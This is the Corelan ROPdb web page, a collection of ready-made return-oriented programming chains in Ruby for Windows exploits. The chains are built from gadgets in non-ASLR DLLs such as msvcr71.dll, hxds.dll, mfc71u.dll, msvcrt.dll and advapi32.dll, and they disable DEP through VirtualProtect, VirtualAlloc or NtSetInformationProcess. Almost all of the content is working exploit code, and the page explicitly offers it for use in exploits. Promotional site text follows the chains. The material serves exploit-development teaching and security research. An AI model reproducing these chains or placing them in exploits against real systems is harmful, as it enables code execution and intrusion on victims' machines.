Corelan ROPdb

This page gathers generic/universal ROP chains that are solely based on gadgets taken from a single dll.

The main requirements for a ROP chain to be listed here are:

  • it must work on XP, Vista, Windows 7, 2003 and 2008 server. (the dll should not rebase and should not be ASLR enabled). If your ROP chain only works on one of the listed operating systems, it must be based on a commonly used module.
  • the chain should be null byte free (unless it’s a common module which contains null bytes). Of course, ROP chains that contains null bytes (or other bad chars) will/might be shorter.
  • the chain should work without any particular setup in terms of preparing registers or assuming that a register contains a given value.
  • you must be the original author of the chain

Ideally, the dll should be not application specific, unless it’s shipped with a major application and/or has the option to get loaded from f.i. a web browser.

If you want to submit your own chain, make sure to include details about the module (name, version, applications it gets shipped with), and indicate if and how the dll can be loaded on demand (if applicable).

Write your chain in the format shown below (ruby) and send it to peter [dot] ve {at} corelan [dot] be

Feel free to use the chains below in your exploits, just don’t forget to credit the original author(s)


msvcr71.dll – v7.10.3052.4

  • Shipped with : JRE (Java) 1.6
  • works on : XP/Vista/Win7/2003/2008
  • Load on demand in browser : YES
  • Rebase : False
  • ASLR : False
  • Safeseh : True
  • Base : 0x7c340000
  • Top : 0x7c396000
  • Size : 0x56000
  • Technique : kernel32.VirtualProtect()
  • Author : corelanc0d3r

Updated (smaller) chain (oct 2011):

rop_gadgets = 
[
	0x7c37653d, 	# POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
	0xfffffdff,	# Value to negate, will become 0x00000201 (dwSize)
	0x7c347f98,	# RETN (ROP NOP) [msvcr71.dll]
	0x7c3415a2,	# JMP [EAX] [msvcr71.dll]
	0xffffffff,	# 
	0x7c376402,	# skip 4 bytes [msvcr71.dll]
	0x7c351e05,	# NEG EAX # RETN [msvcr71.dll] 
	0x7c345255,	# INC EBX # FPATAN # RETN [msvcr71.dll] 
	0x7c352174,	# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 
	0x7c344f87,	# POP EDX # RETN [msvcr71.dll] 
	0xffffffc0,	# Value to negate, will become 0x00000040
	0x7c351eb1,	# NEG EDX # RETN [msvcr71.dll] 
	0x7c34d201,	# POP ECX # RETN [msvcr71.dll] 
	0x7c38b001,	# &Writable location [msvcr71.dll]
	0x7c347f97,	# POP EAX # RETN [msvcr71.dll] 
	0x7c37a151,	# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
	0x7c378c81,	# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
	0x7c345c30,	# ptr to 'push esp #  ret ' [msvcr71.dll]
	# rop chain generated with mona.py
].pack("V*")

(18 dwords)

 

Older (bigger) chain:

rop_gadgets =
[
	0x7c376402,	# POP EBP # RETN [msvcr71.dll] 
	0x7c376402,	# skip 4 bytes [msvcr71.dll]
	0x7c347f97,	# POP EAX # RETN [msvcr71.dll] 
	0xfffffdff,	# Value to negate, will become 0x00000201 (dwSize)
	0x7c351e05,	# NEG EAX # RETN [msvcr71.dll] 
	0x7c354901,	# POP EBX # RETN [msvcr71.dll] 
	0xffffffff,	#  
	0x7c345255,	# INC EBX # FPATAN # RETN [msvcr71.dll] 
	0x7c352174,	# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 
	0x7c344f87,	# POP EDX # RETN [msvcr71.dll] 
	0xffffffc0,	# Value to negate, will become 0x00000040
	0x7c351eb1,	# NEG EDX # RETN [msvcr71.dll] 
	0x7c34d201,	# POP ECX # RETN [msvcr71.dll] 
	0x7c38b001,	# &Writable location [msvcr71.dll]
	0x7c34b8d7,	# POP EDI # RETN [msvcr71.dll] 
	0x7c347f98,	# RETN (ROP NOP) [msvcr71.dll]
	0x7c364802,	# POP ESI # RETN [msvcr71.dll] 
	0x7c3415a2,	# JMP [EAX] [msvcr71.dll]
	0x7c347f97,	# POP EAX # RETN [msvcr71.dll] 
	0x7c37a151,	# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
	0x7c378c81,	# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
	0x7c345c30,	# ptr to 'push esp #  ret ' [msvcr71.dll]
	# rop chain generated with mona.py
].pack("V*")

(22 dwords)


hxds.dll – v2.05.50727.4039

  • Shipped with : MS Office 2010
  • works on : XP/Vista/Win7/2003/2008
  • Load on demand in browser : YES  ( http://www.greyhathacker.net/?p=585 )
  • Rebase : False
  • ASLR : False
  • Safeseh : True
  • Base : 0x51BD0000
  • Top : 0x51CA7000
  • Size : 0xd7000
  • Technique : kernel32.VirtualProtect()
def create_rop_chain(base_hxds.dll)
	# rop chain generated with mona.py - www.corelan.be
	rop_gadgets = 
	[
		base_hxds.dll + 0x00074533,	# POP ESI # RETN [hxds.dll] 
		base_hxds.dll + 0x000010b8,	# ptr to &VirtualProtect() [IAT hxds.dll]
		base_hxds.dll + 0x00002d97,	# MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll] 
		base_hxds.dll + 0x0000cba0,	# XCHG EAX,ESI # RETN 00 [hxds.dll] 
		base_hxds.dll + 0x0006a894,	# POP EBP # RETN [hxds.dll] 
		base_hxds.dll + 0x0002c595,	# & call esp [hxds.dll]
		base_hxds.dll + 0x00076452,	# POP EAX # RETN [hxds.dll] 
		0xa17ffdfe,                	# put delta into eax (-> put 0x00000201 into ebx)
		base_hxds.dll + 0x00041e01,	# ADD EAX,5E800403 # RETN [hxds.dll] 
		base_hxds.dll + 0x0002e67b,	# ADD EBX,EAX # XOR EAX,EAX # RETN [hxds.dll] 
		base_hxds.dll + 0x00076452,	# POP EAX # RETN [hxds.dll] 
		0xa17ffc3d,                	# put delta into eax (-> put 0x00000040 into edx)
		base_hxds.dll + 0x00041e01,	# ADD EAX,5E800403 # RETN [hxds.dll] 
		base_hxds.dll + 0x0002592b,	# XCHG EAX,EDX # RETN [hxds.dll] 
		base_hxds.dll + 0x00017be7,	# POP ECX # RETN [hxds.dll] 
		base_hxds.dll + 0x000906e7,	# &Writable location [hxds.dll]
		base_hxds.dll + 0x0002dd01,	# POP EDI # RETN [hxds.dll] 
		base_hxds.dll + 0x00013a03,	# RETN (ROP NOP) [hxds.dll]
		base_hxds.dll + 0x00074707,	# POP EAX # RETN [hxds.dll] 
		0x90909090,                	# nop
		base_hxds.dll + 0x0000a8dc,	# PUSHAD # POP ECX # RETN [hxds.dll] 
	].flatten.pack("V*")
	return rop_gadgets
end

mfc71u.dll – v7.10.3077.0

  • Rebase : False
  • ASLR : False
  • Safeseh : True
  • Base : 0x7c250000
  • Top : 0x7c352000
  • Size : 0x102000
  • Technique : kernel32.VirtualProtect()
  • Author : corelanc0d3r
rop_gadgets =
	[
	0x7c259e0c,	# POP ECX # RETN (MFC71U.DLL)
	0x7c2512f0,	# <- *&VirtualProtect()
	0x7c2fe7bc,	# MOV EAX,DWORD PTR DS:[ECX] # RETN (MFC71U.DLL)
	0x7c26f014,	# XCHG EAX,ESI # RETN (MFC71U.DLL)
	0x7c2c0809,	# POP EBP # RETN (MFC71U.DLL)
	0x7c289989,	# ptr to 'jmp esp' (from MFC71U.DLL)
	0x7c259e0c,	# POP ECX # RETN (MFC71U.DLL)
	0x7c32b001,	# RW pointer (lpOldProtect) (-> ecx)
	0x7c2de810,	# POP EDI # RETN (MFC71U.DLL)
	0x7c2de811,	# ROP NOP (-> edi)
	0x7c284862,	# POP EAX # RETN (MFC71U.DLL)
	0xffffffc0,	# value to negate, target 0x00000040, -> reg : edx, via ebx
	0x7c252ea0,	# NEG EAX # RETN (MFC71U.DLL)
	0x7c316b89,	# XCHG EAX,EBX # RETN (MFC71U.DLL)
	0x7c288c52,	# XOR EDX,EDX # RETN (MFC71U.DLL)
	0x7c265297,	# ADD EDX,EBX # POP EBX # RETN 10 (MFC71U.DLL)
	0x41414141,	# EBX
	0x7c284862,	# POP EAX # RETN (MFC71U.DLL)
	0x41414141,
	0x41414141,
	0x41414141,
	0x41414141, 	# compensate for RETN 10
	0xfffffdff,	# value to negate, target 0x00000201, target reg : ebx
	0x7c252ea0,	# NEG EAX # RETN (MFC71U.DLL)
	0x7c316b89,	# XCHG EAX,EBX # RETN (MFC71U.DLL) (dwSize)
	0x7c284862,	# POP EAX # RETN (MFC71U.DLL)
	0x90909090,	# NOPS (-> eax)
	0x7c2838ef,	# PUSHAD # RETN (MFC71U.DLL)
	# rop chain generated with mona.py
	].pack("V*")

 

msvcr70.dll – v7.00.9466.0

  • Tested on: XP/Win7
  • Rebase : False
  • ASLR : False
  • Safeseh : False
  • Base : 0x7c000000
  • Top : 0x7c054000
  • Size : 0x00054000
  • Technique : kernel32.VirtualProtect()
  • Author : b33f (Ruben Boonen) – www.fuzzysecurity.com
rop_gadgets = 
[
	0x7c032c80, # XOR EAX,EAX # RETN
	0x7c0126bc, # XCHG EAX,EBP # ADD AL,7C # RETN
	0x7c026652, # POP ESI # RETN
	0xffffffff, # will be 0x00000000
	0x7c03063f, # INC ESI # RETN
	0x7c0358a1, # POP EAX # RETN
	0x7C0390FD, # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B
	0x7c023a4f, # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN
	0x7c0358a1, # POP EAX # RETN
	0x83FF5E94, # neg -> 0x7c00a16c : push esp #  ret
	0x7c0167cd, # NEG EAX # RETN
	0x7c0126b7, # XCHG EAX,EBP # ADD AL,7C # RETN
	0x7c03028f, # POP EBX # RETN
	0xffffffff, # will be 0x00000000
	0x7c01cd53, # INC EBX # XOR AL,AL # RETN
	0x7c0358a1, # POP EAX # RETN
	0xFFFFFDFF, # Neg is 201-HEX (513-bytes)
	0x7c0167cd, # NEG EAX # RETN
	0x7c01561c, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
	0x7c026484, # POP EDI # RETN
	0x7c034e02, # ROP-NOP
	0x7c0358a1, # POP EAX # RETN
	0xFFFFFFC0, # NEG is 0x40
	0x7c0167cd, # NEG EAX # RETN
	0x7c026dc4, # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN
	0x7c034e01, # POP ECX # RETN
	0x7c049001, # lpOldProtect
	0x7c0358a1, # POP EAX # RETN
	0x90909090, # NOP
	0x7c0126b6, # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN
].pack("V*")

 

 


Less generic chains


msvcrt.dll – v7.0.2600.5512 (XP)

  • Rebase: False
  • ASLR: False
  • Safeseh : True
  • Base: 0x77c10000
  • Top: 0x77c68000
  • Size: 0x00058000
  • works on: XP
  • Technique: kernel.VirtualProtect() and kernel.VirtualAlloc()

VirtualProtect (NOT null-byte free)

rop_gadgets = 
	[
	0x77c364d5,	# POP EBP # RETN [msvcrt.dll] 
	0x77c364d5,	# skip 4 bytes [msvcrt.dll]
	0x77c46e91,	# POP EBX # RETN [msvcrt.dll] 
	0x00000201,	# 0x00000201-> ebx
	0x77c4cbf9,	# POP EDX # RETN [msvcrt.dll] 
	0x00000040,	# 0x00000040-> edx
	0x77c2c343,	# POP ECX # RETN [msvcrt.dll] 
	0x77c605b5,	# &Writable location [msvcrt.dll]
	0x77c23b47,	# POP EDI # RETN [msvcrt.dll] 
	0x77c39f92,	# RETN (ROP NOP) [msvcrt.dll]
	0x77c34d9a,	# POP ESI # RETN [msvcrt.dll] 
	0x77c2aacc,	# JMP [EAX] [msvcrt.dll]
	0x77c21d16,	# POP EAX # RETN [msvcrt.dll] 
	0x77c11120,	# ptr to &VirtualProtect() [IAT msvcrt.dll]
	0x77c12df9,	# PUSHAD # RETN [msvcrt.dll] 
	0x77c35524,	# ptr to 'push esp #  ret ' [msvcrt.dll]
	# rop chain generated with mona.py
	].pack("V*")

VirtualAlloc: (NOT null-byte free)

rop_gadgets = 
	[
	0x77c30ae3,	# POP EBP # RETN [msvcrt.dll] 
	0x77c30ae3,	# skip 4 bytes [msvcrt.dll]
	0x77c461c1,	# POP EBX # RETN [msvcrt.dll] 
	0x00000001,	# 0x00000001-> ebx
	0x77c4cdec,	# POP EDX # RETN [msvcrt.dll] 
	0x00001000,	# 0x00001000-> edx
	0x77c3eb23,	# POP ECX # RETN [msvcrt.dll] 
	0x00000040,	# 0x00000040-> ecx
	0x77c3048a,	# POP EDI # RETN [msvcrt.dll] 
	0x77c39f92,	# RETN (ROP NOP) [msvcrt.dll]
	0x77c4c1d1,	# POP ESI # RETN [msvcrt.dll] 
	0x77c2aacc,	# JMP [EAX] [msvcrt.dll]
	0x77c4e392,	# POP EAX # RETN [msvcrt.dll] 
	0x77c1110c,	# ptr to &VirtualAlloc() [IAT msvcrt.dll]
	0x77c12df9,	# PUSHAD # RETN [msvcrt.dll] 
	0x77c354b4,	# ptr to 'push esp #  ret ' [msvcrt.dll]
	# rop chain generated with mona.py
	].pack("V*")

msvcrt.dll – v7.0.3790.3959 (Windows 2003 SP1 & SP2)

  • OS Module
  • Chain works on : Windows 2003 SP1 & SP2

 

rop_gadgets =
	[
	0x77bb2563, # POP EAX # RETN
	0x77ba1114, # <- *&VirtualProtect()
	0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
	junk,
	0x77bb0c86, # XCHG EAX,ESI # RETN
	0x77bc9801, # POP EBP # RETN
	0x77be2265, # ptr to 'push esp #  ret'
	0x77bb2563, # POP EAX # RETN
	0x03C0990F,
	0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
	0x77bb48d3, # POP EBX, RET
	0x77bf21e0, # .data
	0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
	0x77bbfc02, # POP ECX # RETN
	0x77bef001, # W pointer (lpOldProtect) (-> ecx)
	0x77bd8c04, # POP EDI # RETN
	0x77bd8c05, # ROP NOP (-> edi)
	0x77bb2563, # POP EAX # RETN
	0x03c0944f,
	0x77bdd441, # SUB EAX, 03c0940f  
	0x77bb8285, # XCHG EAX,EDX # RETN
	0x77bb2563, # POP EAX # RETN
	nop,
	0x77be6591, # PUSHAD # ADD AL,0EF # RETN
	].pack("V*")

advapi32.dll – 5.1.2600.5755

  • OS Module
  • Chain works on : XP (SP3)
  • Rebase : False
  • ASLR : False
  • Safeseh : True
  • Base : 0x77dd0000
  • Top : 0x77e6b000
  • Size : 0x9b000
  • Technique : ntdll.ZwSetInformationProcess()
  • Author : corelanc0d3r
rop_gadgets = 
	[
	0x77e25c1f, # POP EAX # RETN
	0x77dd1404, # * &NtSetInformationProcess
	0x77dfd448, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04 
	0xffffffff, # (EBP)
	0x77e18a5f, # INC EBP # RETN (set EBP to 0)
	0x41414141, # junk (compensate)
	0x77e01143, # XOR EBP,EAX # RETN	
	0x77e25c1f, # POP EAX # RETN 
	0xffffffde, # -> 0x22 -> EDX
	0x77dd9b16, # NEG EAX # RETN 
	0x77df563a, # XCHG EAX,EBX # RETN 
	0x77de97ac, # MOV EDX,EBX # POP ESI # POP EBX # RETN 10 
	0x77e3cb79, # RETN -> ESI
	0xffffffff, # -> EBX
	0x77ddbf44, # POP ECX # RETN 
	0x41414141, # compensate
	0x41414141, # compensate
	0x41414141, # compensate
	0x41414141, # compensate
	0x77e4b1fc, # ptr to 0x02
	0x77e25c1f, # POP EAX # RETN
	0xfffffffc, # -> 0x4
	0x77dd9b16, # NEG EAX # RETN
	0x77e3cb78, # POP EDI # RETN	
	0x77e3cb79, # RETN
	0x77de75ed, # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN 
	].pack("V*")

Note : the IAT entry in advapi32.dll (NtSetInformationProcess() at 0x77dd1404) is static on all versions os XP


3 Responses to Corelan ROPdb

Corelan Live training

Since 2011, Corelan GCV has been teaching live win32 exploit dev classes at various security cons and private companies & organizations.

You can read more about the training and schedules here

Demand Global Change

The world needs your help !

Please take a few moments to read the "Demand Global Change Call For Action" document at
http://bit.ly/demandglobalchange
Read the full document at
http://bit.ly/demandglobalchange_full and share the message with as many people as possible.

Like the Facebook page, and SHARE it with everyone you know.



Donate

Want to support the Corelan Team community ? Click here to go to our donations page.

Want to donate BTC to Corelan Team?



Your donation will help funding server hosting.

Protected by Copyscape Web Plagiarism Tool

Corelan Team Merchandise

You can support Corelan Team by donating or purchasing items from the official Corelan Team merchandising store.

Corelan on IRC

You can chat with us and our friends on #corelan (freenode IRC)

Categories